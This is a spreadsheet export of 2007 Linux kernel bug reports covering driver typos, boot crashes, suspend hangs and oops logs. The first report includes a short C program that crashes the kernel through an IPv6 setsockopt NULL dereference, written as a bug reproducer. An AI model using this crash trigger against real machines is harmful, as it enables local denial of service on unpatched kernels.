    <t>Distribution: Ubuntu Edgy Eft Hardware Environment: i686/Pentium M Software Environment: Kernel 2.6.17-11-386 Problem Description: There is a NULL pointer dereference in the function do_ipv6_setsockopt in net/ipv6/ipv6_sockglue.c. Line 417, opt can be NULL and dereferenced : opt = ipv6_renew_options(sk, np-&gt;opt, optname, // opt = NULL (struct ipv6_opt_hdr __user *)optval, optlen); if (IS_ERR(opt)) { retv = PTR_ERR(opt); break; } /* routing header option needs extra check */ if (optname == IPV6_RTHDR &amp;&amp; opt-&gt;srcrt) { // Oops Those few lines reproduce the bug : #include &lt;netinet/in.h&gt; int main(int argc, char **argv) { int s, optval; s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, SOL_IPV6, IPV6_RTHDR, &amp;optval, 0); return 0; } Kernel Oops here : Mar 8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000010 Mar 8 23:57:17 localhost kernel: printing eip: Mar 8 23:57:17 localhost kernel: f8ebb270 Mar 8 23:57:17 localhost kernel: *pde = 00000000 Mar 8 23:57:17 localhost kernel: Oops: 0000 [#1] Mar 8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core 8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211 ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor Mar 8 23:57:17 localhost kernel: CPU: 0 Mar 8 23:57:17 localhost kernel: EIP: 0060:[&lt;f8ebb270&gt;] Tainted: P VLI Mar 8 23:57:17 localhost kernel: EFLAGS: 00010246 (2.6.17-11-386 #2) Mar 8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6] Mar 8 23:57:17 localhost kernel: eax: 00000000 ebx: f0cfca40 ecx: 00000039 edx: 00000000 Mar 8 23:57:17 localhost kernel: esi: 00000000 edi: 00000000 ebp: 00000039 esp: f25a9da8 Mar 8 23:57:17 localhost kernel: ds: 007b es: 007b ss: 0068 Mar 8 23:57:17 localhost kernel: Process null_deref (pid: 5076, threadinfo=f25a8000 task=f24a7580) Mar 8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff 00000001 00000000 f0cfce58 ee42e9c0 Mar 8 23:57:17 localhost kernel: c18e1e7c c0179c74 3b9aca00 c199ce00 c18e1de0 ee42e9c0 c18e1e7c 00000000 Mar 8 23:57:17 localhost kernel: c199ce00 00000000 ee42e9c0 c18e1e7c 00000000 c013c78b 00001000 c0359330 Mar 8 23:57:17 localhost kernel: Call Trace: Mar 8 23:57:17 localhost kernel: &lt;c0179c74&gt; __mark_inode_dirty+0x34/0x170 &lt;c013c78b&gt; do_generic_mapping_read+0x42b/0x540 Mar 8 23:57:17 localhost kernel: &lt;c0154f74&gt; cache_alloc_refill+0x314/0x4d0 &lt;c01cc98c&gt; vsnprintf+0x55c/0x640 Mar 8 23:57:17 localhost kernel: &lt;c016f0b7&gt; d_alloc+0x27/0x190 &lt;c016f059&gt; d_instantiate+0x49/0x80 Mar 8 23:57:17 localhost kernel: &lt;f8eba7e0&gt; ipv6_setsockopt+0x0/0xc40 [ipv6] &lt;c0289966&gt; tcp_setsockopt+0x36/0x370 Mar 8 23:57:17 localhost kernel: &lt;c0259e83&gt; sock_common_setsockopt+0x23/0x30 &lt;c02587d5&gt; sys_setsockopt+0x75/0xd0 Mar 8 23:57:17 localhost kernel: &lt;c0259a19&gt; sys_socketcall+0x209/0x280 &lt;c02c7a00&gt; do_page_fault+0x0/0x6e0 Mar 8 23:57:17 localhost kernel: &lt;c0102dbb&gt; sysenter_past_esp+0x54/0x79 Mar 8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83 3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6 ff ff 90 &lt;8b&gt; 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 Mar 8 23:57:17 localhost kernel: EIP: [&lt;f8ebb270&gt;] ipv6_setsockopt+0xa90/0xc40 [ipv6] SS:ESP 0068:f25a9da8</t>
  </si>
  <si>
    <t>Oliver Pinter</t>
  </si>
  <si>
    <t>via-velocity spelling error</t>
  </si>
  <si>
    <t>2.6.18+</t>
  </si>
  <si>
    <t>2007-03-09 07:12 UTC</t>
  </si>
  <si>
    <t>Jon Nelson</t>
  </si>
  <si>
    <t>2007-06-09 17:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: n/a Distribution: openSUSE Hardware Environment: n/a Software Environment: n/a Problem Description: spelling error Steps to reproduce: have a via velocity, and plug it in. My copy of via-velocity.c, line 1561, reads: VELOCITY_PRT(MSG_LEVEL_INFO, KERN_NOTICE "%s: Link autonegation", vptr-&gt;dev-&gt;name); "autonegotiation" is mis-spelled.</t>
  </si>
  <si>
    <t>Crash after "Allocating PCI resources" -- used to work in 2.6.21-rc2</t>
  </si>
  <si>
    <t>2.6.21-rc3</t>
  </si>
  <si>
    <t>2007-03-09 11:42 UTC</t>
  </si>
  <si>
    <t>Vladimir Brik</t>
  </si>
  <si>
    <t>2007-03-18 13:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-rc2 Distribution: Gentoo Hardware Environment: Soekris net4521 embedded board, i486 AMD Elan, 64MB RAM Software Environment: Diskless boot using NFS Problem Description: Apparent kernel crash on boot 2.6.21-rc3 crashes on boot: Booting 'Diskless Gentoo' root (nd) Filesystem type is tftp, using whole disk kernel /skr/boot/bzImage ip=dhcp root=/dev/nfs nfsroot=172.16.0.1:/diskless/skr console=ttyS0,19200n81 earlyprintk=ttyS0,19200n81 [Linux-bzImage, setup=0x1400, size=0xf6e70] Linux version 2.6.21-rc3 (root@aces) (gcc version 4.1.1 (Gentoo 4.1.1)) #1 Fri Mar 9 19:13:30 Local time zone must be set--see zic manua BIOS-provided physical RAM map: sanitize start sanitize end copy_e820_map() start: 0000000000000000 size: 000000000009fc00 end: 000000000009fc00 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 000000000009fc00 size: 0000000000000400 end: 00000000000a0000 type: 2 copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2 copy_e820_map() start: 0000000000100000 size: 0000000003f00000 end: 0000000004000000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 00000000fff00000 size: 0000000000100000 end: 0000000100000000 type: 2 BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000004000000 (usable) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) 64MB LOWMEM available. Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 16384 early_node_map[1] active PFN ranges 0: 0 -&gt; 16384 DMI not present or invalid. Allocating PCI resources starting at 10000000 (gap: 04000000:fbf00000) Int 6: CR2 00000000 err 00000000 EIP c010676a CS c02e0060 flags 00010046 Stack: 00000000 c02a93a0 c02cdbd0 ffffffff c02daea9 c02dae40 c02c8865 c024a000 lspci: 00:00.0 Host bridge: Advanced Micro Devices [AMD] ELanSC520 Microcontroller 00:11.0 CardBus bridge: Texas Instruments PCI1420 00:11.1 CardBus bridge: Texas Instruments PCI1420 00:12.0 Ethernet controller: National Semiconductor Corporation DP83815 (MacPhyter) Ethernet Controller 00:13.0 Ethernet controller: National Semiconductor Corporation DP83815 (MacPhyter) Ethernet Controller The same .config works fine with 2.6.21-rc2.</t>
  </si>
  <si>
    <t>pata_via: wrong cable detection on PATA controller</t>
  </si>
  <si>
    <t>2.6.21-rc3-mm2</t>
  </si>
  <si>
    <t>2007-03-10 00:11 UTC</t>
  </si>
  <si>
    <t>2007-03-21 13:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20-mm1 Distribution: Mandriva 2007.1 (Cooker) for i586 Hardware Environment: Motherboard: asus A7V133-C IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) Problem Description: 2 hard disks are plugged on first IDE slot through a 80-wire cable. But kernel wrongly detect a 40-wire cable for the first disk only. The second disk is OK. # dmesg | grep -e ata -e scsi ... libata version 2.20 loaded. pata_via 0000:00:04.1: version 0.2.1 ata1: PATA max UDMA/100 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x0001b800 irq 14 ata2: PATA max UDMA/100 cmd 0x00010170 ctl 0x00010376 bmdma 0x0001b808 irq 15 scsi0 : pata_via ata1.00: ATA-5: ST340016A, 3.75, max UDMA/100 ata1.00: 78165360 sectors, multi 16: LBA ata1.01: ATA-7: Maxtor 6Y080L0, YAR41BW0, max UDMA/133 ata1.01: 160086528 sectors, multi 16: LBA ata1.00: limited to UDMA/33 due to 40-wire cable ata1.00: configured for UDMA/33 ata1.01: configured for UDMA/100 scsi1 : pata_via ata2.00: ATAPI, max UDMA/33 ata2.01: ATAPI, max MWDMA2, CDB intr ata2.00: configured for UDMA/33 ata2.01: configured for MWDMA2 scsi 0:0:0:0: Direct-Access ATA ST340016A 3.75 PQ: 0 ANSI: 5 scsi 0:0:1:0: Direct-Access ATA Maxtor 6Y080L0 YAR4 PQ: 0 ANSI: 5 scsi 1:0:0:0: CD-ROM HL-DT-ST DVDRAM GSA-4165B DL03 PQ: 0 ANSI: 5 scsi 1:0:1:0: CD-ROM E-IDE CD-950E/AKU A4Q PQ: 0 ANSI: 5 sd 0:0:0:0: Attached scsi disk sda sd 0:0:1:0: Attached scsi disk sdb ...</t>
  </si>
  <si>
    <t>Oops with RSDL at boot</t>
  </si>
  <si>
    <t>2.6.21-rc3-mm2 + RSDL</t>
  </si>
  <si>
    <t>2007-03-10 03:16 UTC</t>
  </si>
  <si>
    <t>2007-03-11 08:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.21-rc3-mm1 Distribution: Fedora Devel Hardware Environment: AMD64 X2 on CK804 Software Environment: boot scripts Problem Description: On 2.6.21-rc3-mm2 + hot-fixes + http://ck.kolivas.org/patches/staircase-deadline/2.6.21-rc3-mm2-rsdl.patch Oops at boot time Steps to reproduce: Try to boot</t>
  </si>
  <si>
    <t>usb: no configuration chosen from 1 choice</t>
  </si>
  <si>
    <t>2007-03-10 03:45 UTC</t>
  </si>
  <si>
    <t>Nick Shaforostoff</t>
  </si>
  <si>
    <t>2007-08-09 23:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.15 Distribution: Debian (but compiled vanilla kernel) Problem Description: kernels beginning with 2.6.16 have typo in their sources, wich causes usb modem detecion to fail. kern.log says: usb 3-1: new full speed USB device using ohci_hcd and address 2 usb 3-1: no configuration chosen from 1 choice the solution is to replace #ifndef CONFIG_USB_NET_RNDIS_HOST with #ifndef CONFIG_USB_NET_RNDIS_HOST_MODULE in drivers/usb/core/hub.c -- for 2.6.18 or in drivers/usb/core/generic.c -- for 2.6.20.1</t>
  </si>
  <si>
    <t>IDE "lost interrupt" messages on bootup</t>
  </si>
  <si>
    <t>2.6.20-2.6.21-rc3</t>
  </si>
  <si>
    <t>2007-03-10 15:37 UTC</t>
  </si>
  <si>
    <t>2007-03-22 10:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.1 Distribution: Debian Testing/etch Hardware Environment: pentium4, Intel ICH5 IDE Controller hda: Western Digital 200GB drive (using 48-bit LBA) hdb: Maxtor 80GB Software Environment: Problem Description: It detects all drives correctly, however right when it starts populating udev devices, it starts having trouble with the drives: [ 29.743553] hdb: set_drive_speed_status: status=0xd0 { Busy } [ 29.746934] ide: failed opcode was: unknown [ 39.716197] hda: lost interrupt ... message repeated at regular 30-second intervals until ... [ 249.205566] hda: lost interrupt [ 249.209282] hdb: cache flushes supported [ 249.817471] hda: set_drive_speed_status: status=0x58 { DriveReady SeekComplete DataRequest } [ 249.820925] ide: failed opcode was: unknown [ 249.919031] hda: cache flushes supported In addition, the last time I booted it up, the /lib/modules/2.6.21-rc3 directory entry was misread (probably related to the lost interrupts), and that single directory entry was corrupt, though everything returned to normal the next time it booted, so it was just reading from IDE. The system works completely normally after it gets past the "cache flushes supported" except for that one time it couldn't load modules. Steps to reproduce: I only know that it is completely reproducible (tried 3 times). It happens after a page of entries, and always right after displaying "Waiting for /dev to be fully populated", and ends a after the udev script shows "timeout". I will try to test an intermediate kernel like 2.6.20 to see if it happens there.</t>
  </si>
  <si>
    <t>OSS trident driver: race or erroneous comment?</t>
  </si>
  <si>
    <t>2007-03-10 18:43 UTC</t>
  </si>
  <si>
    <t>2007-11-20 03:03 UTC</t>
  </si>
  <si>
    <t>ati_remote2 module only supports remote "channel" 1</t>
  </si>
  <si>
    <t>2007-03-11 04:00 UTC</t>
  </si>
  <si>
    <t>Peter Stokes</t>
  </si>
  <si>
    <t>2007-08-09 23:21 UTC</t>
  </si>
  <si>
    <t>The ATI Remote Wonder II USB remote control supports multiple remote "channels" in order to facilitate the use of multiple remote controls within range of each other. The remote's "channel" may be altered by pressing and holding the "PC" button for approximately 3 seconds after which the button will slowly flash the count of the currently configured "channel". If a number, between 1 and 16, is keyed in and then the "PC" button is pressed again, then the remote's "channel" is changed to that number. The current "ati_remote2" kernel module interprets any signals from a remote that is not configured for "channel" 1 as "Unknown mode byte" and consequently ignores them. The attached patch resolves this issue by adding a "channel_mask" bit-mask module parameter, thus allowing the specification of which remote "channels" to accept. There are two ways of filtering the control signals from the remote control:- A USB control message can be sent to the receiver instructing it as to which remote "channel" it should accept. This functionality is implemented in the new "ati_remote2_setup" function. This filtering only allows for a single remote "channel" to be accepted. (This configuration was reverse engineered from the Windows software using a USB packet sniffer). When configured for a single channel the hardware filters the signals from other channels and they are not passed to the host. If the module is configured to accept input from multiple remote "channels" then the hardware filtering cannot be employed. Under such circumstances the hardware filtering is configured for "channel" 0 (which actually means "accept any channel") and the filtering is performed in software by the driver. By default, the module is configured to accept input from any remote on any "channel", providing the easiest setup.</t>
  </si>
  <si>
    <t>suspend/resume hangs until keypress</t>
  </si>
  <si>
    <t>2.6.29-rc3-git20070311</t>
  </si>
  <si>
    <t>2007-03-12 04:28 UTC</t>
  </si>
  <si>
    <t>Tomas Janousek</t>
  </si>
  <si>
    <t>2007-03-17 07:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: debian testing/unstable Hardware Environment: HP Compaq nx7300 (generally the same as nx7400) Software Environment: Problem Description: I use hibernate and uswsusp. When I try to suspend to disk, it gets stuck on 'Suspending consoles' and does not continue until I press like 3 keys. It does the same on resume.</t>
  </si>
  <si>
    <t>Ocotea board: ntpd complains that the frequency error exceeds the tolerance</t>
  </si>
  <si>
    <t>2007-03-12 05:41 UTC</t>
  </si>
  <si>
    <t>Bart Van Assche</t>
  </si>
  <si>
    <t>2007-05-15 05:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: probably never worked correctly. Distribution: MontaVista Linux 4.0.1 Hardware Environment: AMCC's Ocotea board Software Environment: MontaVista Linux 4.0.1 with mainline 2.6.20.1 kernel Problem Description: ntpd complains that the frequency error exceeds the tolerance Steps to reproduce: - Boot an Ocotea board with the mainline 2.6.20.1 kernel. - Create an /etc/ntp.conf file with at least one NTP server and iburst mode set. - Issue the command "ntpd -g". - Wait about two minutes. - Verify ntpd's status via "ntpq -pn" and by looking in /var/log/ntp. Patch that fixes this problem: --- arch/ppc/platforms/4xx/ocotea.c.orig 2007-03-12 13:24:35.000000000 +0100 +++ arch/ppc/platforms/4xx/ocotea.c 2007-03-12 13:26:03.000000000 +0100 @@ -289,7 +289,7 @@ * from FPGA, because it can be changed by on-board switches * --ebs */ - ibm440gx_get_clocks(&amp;clocks, 33333333, 6 * 1843200); + ibm440gx_get_clocks(&amp;clocks, 33300000, 6 * 1843200); ocp_sys_info.opb_bus_freq = clocks.opb; /* Setup TODC access */</t>
  </si>
  <si>
    <t>ehci_hcd can't reinitialize scanner after suspend to RAM</t>
  </si>
  <si>
    <t>2.6.20, 2.6.21-rc3-gbe521466</t>
  </si>
  <si>
    <t>2007-03-13 00:51 UTC</t>
  </si>
  <si>
    <t>2007-03-16 06:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution:gentoo 2006.1 i686-pc-linux-gnu Hardware Environment:scanner epson perfection 1670, 82801G (ICH7 Family) USB2 EHCI Controller Problem Description: with suspend to ram kernel will set scanner to the standby mode, but after resume kernel can't resume scanner _if_ ehci (module) is used. With this issue sane can't use the scanner you need replug it to make it use. This issue not upper if kernel compiled without ehci support. Steps to reproduce: 1. compile kernel with ehci (module or build-in) and restart 2. plugin scanner (sane is working) 3. echo mem &gt; /sys/power/state &amp;&amp; scanner will be set to standby mode too. 4. resume &amp;&amp; scanner will stay in standby mode 5. replug the scanner to make it use.</t>
  </si>
  <si>
    <t>Asus Notebooks only have full power off the dc</t>
  </si>
  <si>
    <t>2.6.20-2 (but in all kernel releases)</t>
  </si>
  <si>
    <t>2007-03-13 11:01 UTC</t>
  </si>
  <si>
    <t>Bernhard</t>
  </si>
  <si>
    <t>2007-04-16 02:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: there's no kernel without this bug Distribution: openSUSE 10.2, mandriva 2007 Hardware Environment: Asus Z9252Va, but this affects most Asus Notebooks (and some others (sony vaio) Software Environment: Problem Description: The notebooks are really slow when they are plugged in. When they're running on battery there's no problem with performance... but when you plug them in again the performance decreases rapidly... we've found a solution on the linux-club forum: http://www.linux-club.de/viewtopic.php?p=456891#456891 the failure is because of the smp kernel which is integrated into the kernel, and so the notebooks choose a false mode for it.. when you deactivate smp in the kernel and compile it new the problem is solved.. so maybe there's a possibility to detect whether it's an asus notebook and therefore deactivate smp. Steps to reproduce: everytime (during boot, work, simply everytime)</t>
  </si>
  <si>
    <t>didn't work "make" after "make menuconfig"</t>
  </si>
  <si>
    <t>2.6.20.3</t>
  </si>
  <si>
    <t>2007-03-14 06:10 UTC</t>
  </si>
  <si>
    <t>Andrey</t>
  </si>
  <si>
    <t>2007-03-26 00:05 UTC</t>
  </si>
  <si>
    <t>Fedora Core release 6 (Zod) gcc-4.1.1-51.fc6 ncurses-devel-5.5-24.20060715 Trouble in installation menu. When enter "make menuconfig", then save configuration, then "exit". Current configuration will save, but don't have menu "are you sure". And then we have error - can't do "make" command after that. I surpose that problem present on all 2.6.20.* kernels.</t>
  </si>
  <si>
    <t>udevd triggers oops when walking through /sys</t>
  </si>
  <si>
    <t>2007-03-14 17:49 UTC</t>
  </si>
  <si>
    <t>Chris Rankin</t>
  </si>
  <si>
    <t>2007-07-05 04:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.3 (to my knowledge - I haven't run every stable kernel since) Distribution: FC5 Hardware Environment: Dual P4 Xeon (Northwood) with HT enabled; 2 GB RAM. Software Environment: FC5, with Xorg from FC6 Problem Description: These oopsen have appeared with 2.6.20.1 and 2.6.20.2; some of the 2.6.20.1 kernels have included a patch to show the last sysfs file (presumably the one with the faulty reference count). BUG: unable to handle kernel paging request at virtual address 6b6b6d6b printing eip: c0130113 *pde = 00000000 Oops: 0002 [#1] PREEMPT SMP last sysfs file: /class/net/eth2/statistics/collisions Modules linked in: snd_rtctimer radeon drm pwc eeprom cpufreq_ondemand p4_clockmod speedstep_lib nfsd exportfs ipv6 autofs4 nfs lockd sunrpc af_packet firmware_class binfmt_misc video thermal processor fan button video1394 raw1394 ac lp parport_pc parport nvram eth1394 compat_ioctl32 videodev v4l2_common v4l1_compat snd_usb_audio snd_usb_lib sd_mod sg snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_emu10k1 snd_rawmidi snd_ac97_codec ohci1394 ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event ieee1394 snd_seq snd_pcm_oss sata_sil ehci_hcd uhci_hcd snd_mixer_oss libata e7xxx_edac edac_mc snd_pcm e1000 i2c_i801 i2c_core ide_cd intel_agp agpgart serio_raw psmouse scsi_mod snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep snd soundcore cdrom pcspkr usbcore ext3 jbd CPU: 1 EIP: 0060:[&lt;c0130113&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.20.1 #3) EIP is at module_put+0x20/0x52 eax: 6b6b6d6b ebx: 6b6b6b6b ecx: 00000001 edx: e0049000 esi: f60f7b08 edi: 6b6b6b6b ebp: ebc14e0c esp: e0049f58 ds: 007b es: 007b ss: 0068 Process udevd (pid: 7608, ti=e0049000 task=f7e6b030 task.ti=e0049000) Stack: f7898edc c0183a5b 00000010 ed5bbb7c eccd0978 c0151253 00000000 00000000 f7ff2208 ed5bbb7c f75b5360 00000000 ed5bbb7c c014ed90 00000003 00000003 f75b5360 f75b53e0 c014fd89 00000003 00000007 00000003 e0049000 c0102bce Call Trace: [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= Code: 00 89 f0 83 c4 0c 5b 5e 5f 5d c3 53 89 c3 85 c0 74 49 b8 01 00 00 00 e8 5f 49 fe ff e8 3b 5b 07 00 c1 e0 07 8d 84 18 80 01 00 00 &lt;ff&gt; 08 83 3b 02 75 0b 8b 83 88 05 00 00 e8 a9 45 fe ff b8 01 00 EIP: [&lt;c0130113&gt;] module_put+0x20/0x52 SS:ESP 0068:e0049f58 &lt;6&gt;note: udevd[7608] exited with preempt_count 1 BUG: scheduling while atomic: udevd/0x10000001/7608 [&lt;c026f9d6&gt;] __sched_text_start+0x56/0x965 [&lt;c011cc72&gt;] irq_exit+0x37/0x42 [&lt;c010d1d7&gt;] smp_apic_timer_interrupt+0x70/0x79 [&lt;c010369c&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c0114b01&gt;] __cond_resched+0x12/0x2c [&lt;c02708e9&gt;] cond_resched+0x26/0x31 [&lt;c01404d2&gt;] unmap_vmas+0x3d3/0x4df [&lt;c0142cf5&gt;] exit_mmap+0x7e/0x10a [&lt;c0116bd7&gt;] mmput+0x1d/0x78 [&lt;c011b322&gt;] do_exit+0x1b2/0x6d8 [&lt;c011007b&gt;] sys_vm86+0x99/0x21d [&lt;c01040fc&gt;] die+0x1f7/0x21c [&lt;c011180e&gt;] do_page_fault+0x442/0x510 [&lt;c01113cc&gt;] do_page_fault+0x0/0x510 [&lt;c027230c&gt;] error_code+0x7c/0x84 [&lt;c0130113&gt;] module_put+0x20/0x52 [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= BUG: unable to handle kernel paging request at virtual address 6b6b6deb printing eip: c0130113 *pde = 00000000 Oops: 0002 [#1] PREEMPT SMP last sysfs file: /class/usb_endpoint/usbdev1.3_ep84/dev Modules linked in: radeon drm pwc eeprom cpufreq_ondemand p4_clockmod speedstep_lib nfsd exportfs ipv6 autofs4 nfs lockd sunrpc af_packet firmware_class binfmt_misc video thermal processor fan button ac lp parport_pc parport nvram video1394 raw1394 eth1394 sd_mod sg compat_ioctl32 videodev v4l2_common v4l1_compat snd_usb_audio snd_usb_lib snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_emu10k1 snd_rawmidi snd_ac97_codec ac97_bus ohci1394 snd_seq_dummy snd_seq_oss snd_seq_midi_event ieee1394 snd_seq e1000 sata_sil snd_pcm_oss snd_mixer_oss ehci_hcd snd_pcm uhci_hcd libata e7xxx_edac serio_raw snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep snd soundcore scsi_mod edac_mc ide_cd psmouse intel_agp i2c_i801 i2c_core agpgart cdrom pcspkr usbcore ext3 jbd CPU: 2 EIP: 0060:[&lt;c0130113&gt;] Not tainted VLI EFLAGS: 00010206 (2.6.20.1 #3) EIP is at module_put+0x20/0x52 eax: 6b6b6deb ebx: 6b6b6b6b ecx: 00000001 edx: e8b24000 esi: ed7667b0 edi: 6b6b6b6b ebp: e88b162c esp: e8b24f58 ds: 007b es: 007b ss: 0068 Process udevd (pid: 4457, ti=e8b24000 task=f7fa6560 task.ti=e8b24000) Stack: e8b39640 c0183a5b 00000010 ed4a2cb4 e9cf2978 c0151253 00000000 00000000 f7ff2208 ed4a2cb4 f787e678 00000000 ed4a2cb4 c014ed90 00000003 00000003 f787e678 f787e6f8 c014fd89 00000003 00000007 00000003 e8b24000 c0102bce Call Trace: [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= Code: 00 89 f0 83 c4 0c 5b 5e 5f 5d c3 53 89 c3 85 c0 74 49 b8 01 00 00 00 e8 5f 49 fe ff e8 3b 5b 07 00 c1 e0 07 8d 84 18 80 01 00 00 &lt;ff&gt; 08 83 3b 02 75 0b 8b 83 88 05 00 00 e8 a9 45 fe ff b8 01 00 EIP: [&lt;c0130113&gt;] module_put+0x20/0x52 SS:ESP 0068:e8b24f58 &lt;6&gt;note: udevd[4457] exited with preempt_count 1 BUG: scheduling while atomic: udevd/0x10000001/4457 [&lt;c026f9d6&gt;] __sched_text_start+0x56/0x965 [&lt;c011cc72&gt;] irq_exit+0x37/0x42 [&lt;c010d1d7&gt;] smp_apic_timer_interrupt+0x70/0x79 [&lt;c010369c&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c0114b01&gt;] __cond_resched+0x12/0x2c [&lt;c02708e9&gt;] cond_resched+0x26/0x31 [&lt;c01404d2&gt;] unmap_vmas+0x3d3/0x4df [&lt;c0142cf5&gt;] exit_mmap+0x7e/0x10a [&lt;c0116bd7&gt;] mmput+0x1d/0x78 [&lt;c011b322&gt;] do_exit+0x1b2/0x6d8 [&lt;c011007b&gt;] sys_vm86+0x99/0x21d [&lt;c01040fc&gt;] die+0x1f7/0x21c [&lt;c011180e&gt;] do_page_fault+0x442/0x510 [&lt;c01113cc&gt;] do_page_fault+0x0/0x510 [&lt;c027230c&gt;] error_code+0x7c/0x84 [&lt;c0130113&gt;] module_put+0x20/0x52 [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= Linux version 2.6.20.1 (chris@xxxxxxxxxxxxxxxxxx) (gcc version 4.1.1 20070105 (Red Hat 4.1.1-51)) #3 SMP PREEMPT Thu Mar 1 12:06:59 GMT 2007 BIOS-provided physical RAM map: sanitize start sanitize end copy_e820_map() start: 0000000000000000 size: 00000000000a0000 end: 00000000000a0000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2 copy_e820_map() start: 0000000000100000 size: 000000007fe75000 end: 000000007ff75000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 000000007ff75000 size: 0000000000002000 end: 000000007ff77000 type: 4 copy_e820_map() start: 000000007ff77000 size: 0000000000021000 end: 000000007ff98000 type: 3 copy_e820_map() start: 000000007ff98000 size: 0000000000068000 end: 0000000080000000 type: 2 copy_e820_map() start: 00000000fec00000 size: 0000000000090000 end: 00000000fec90000 type: 2 copy_e820_map() start: 00000000fee00000 size: 0000000000010000 end: 00000000fee10000 type: 2 copy_e820_map() start: 00000000ffb00000 size: 0000000000500000 end: 0000000100000000 type: 2 BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007ff75000 (usable) BIOS-e820: 000000007ff75000 - 000000007ff77000 (ACPI NVS) BIOS-e820: 000000007ff77000 - 000000007ff98000 (ACPI data) BIOS-e820: 000000007ff98000 - 0000000080000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec90000 